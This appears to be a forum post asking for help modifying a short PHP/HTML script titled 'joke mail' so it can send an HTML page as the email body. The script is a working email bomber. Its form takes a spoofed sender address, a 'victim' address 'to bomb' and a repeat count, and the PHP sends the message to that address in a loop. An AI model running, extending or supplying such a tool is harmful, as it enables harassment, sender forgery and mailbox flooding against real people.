I need some help
I have a script that is sending emails
I need to put in the body a html page for example
this is the script:
<html>
<head>
<title>joke mail</title>
<style>
body{
background-color:#000000; color:#666666; font-family:"Courier New", Courier, mono; font-size:13px;
}
input {
font-family:"Courier New", Courier, mono; color: #666666; background-color:#000000;
border: 1px solid #666666;
text-align:center;
}
</style>
</head>
<body>
<center>
<form name="hax" method="post">
<b>Adresa ta:</b><br>
<input name="from" type="text" alt="Enter your e-mail address (or a spoofed one)"></input><br>
<b>Adresa victimei:</b><br>
<input name="to" type="text" alt="The address you wish to bomb"></input><br>
<b>Subiect:</b><br>
<input name="subject" type="text" alt="The subject of the emails"></input><br> <b>Text:</b><br>
<input name="body" type="text" alt="Body of the email"></input><br> <b>De cate ori:</b><br>
<input name="times" type="text" size="3" alt="Send how many times?"></input><br><br>
<input name="submit" type="submit" value="Submit">
</form>
</center>
</body>
</html>
<?php
$from = $_POST['from'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$body = $_POST['body'];
$times = $_POST['times'];
$i = 0;
while($i < $times){
mail("$to", "$subject", "$body", "From: $from" );
$i++;
}
?>
In the body I want to make the change and I don't know how
please help me

i uploaded the picture to see what i want
thank you